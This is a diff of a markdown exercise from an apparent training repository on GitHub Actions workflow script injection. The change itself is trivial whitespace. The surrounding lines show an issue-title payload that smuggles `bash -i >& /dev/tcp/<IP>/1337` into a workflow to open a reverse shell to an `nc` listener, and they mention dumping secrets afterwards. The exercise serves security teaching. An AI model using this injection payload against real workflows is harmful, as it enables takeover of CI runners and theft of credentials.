newline

exercises/exercise-1.md

@@ -13,7 +13,7 @@ Let's create a new issue with this title and see what happens. We observe that t
 <img width="1042" alt="Screenshot 2023-08-30 at 7 38 43 PM" src="https://github.com/robandpdx/workflow-script-injection/assets/95243761/e3fa3917-2834-45cc-a297-d25614c3185e">
 
 Ok. Big deal. So we were able to see what is in the workspace directory. Who cares?  
-Now let's try something a little more sinister...
+Now let's try something a little more sinister...  
 Spin up a linux vm in the cloud that has a public IP address. Login and run `nc -nvlp 1337`. Then open a new issue with the title `octocat"; bash -i >& /dev/tcp/<YOUR-VM-IP-ADDRESS>/1337 0>&1 ; ls -l $GITHUB_WORKSPACE"`  
 
 Now I have a shell on the runner! This is a great "foot in the door" from which I can attemp other exploits, like dumping secrets or cloud credentials to use in other attacks.